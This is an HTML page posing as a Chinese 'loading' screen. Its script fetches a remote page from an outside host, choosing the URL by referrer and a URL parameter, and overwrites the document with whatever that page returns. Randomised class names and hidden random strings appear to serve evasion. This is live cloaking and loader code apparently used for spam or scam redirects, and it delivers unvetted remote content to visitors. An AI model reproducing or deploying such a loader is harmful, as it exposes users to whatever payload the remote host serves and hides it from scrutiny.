<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mwUHcF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mwUHcF .vyv6Ck4 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mwUHcF .content {
            line-height: 50px;
            text-align: center
        }

        .mwUHcF .img {
            width: 100%
        }

        .mwUHcF .UvaM82pPVu {
            text-align: center
        }

        .mwUHcF .UvaM82pPVu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mwUHcF .UvaM82pPVu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mwUHcF .UvaM82pPVu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mwUHcF .UvaM82pPVu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mwUHcF .UvaM82pPVu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mwUHcF .UvaM82pPVu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mwUHcF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kHJxz86NaGj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lk0bpIb = kHJxz86NaGj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lk0bpIb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lk0bpIb +".html?a=share";
		}
		
        tQTN4vNs=url+"#"+new Date().getTime();
        tQTN4vNs && function() {
            $.get(tQTN4vNs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>xucuybQ0089MF6TJ3LP1oBhZWXc</a>
<h1 style='display:none' >z566Y0bjGbz0jdwvloCYLNG9iBPNhpNZsz5Aly3l8UYqVBUY0TUC60rzr</h1>
<h1 style='display:none' >z566Y0bjGbz0jdwvloCYLNG9iBPNhpNZsz5Aly3l8UYqVBUY0TUC60rzr</h1><div class="mwUHcF">
    <div class="vyv6Ck4">
        <div class="UvaM82pPVu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>N2p3qbn5lmybuFPOG9vL8L3DPCFeqgYgjXIHN</span>
<a  href='#' style='display:none'>hQzWtrCUhu5OEVTRXUcBDhynpDSEboqaKfnHoxe4</a>
<img  src='' style='display:none'></body>
</html>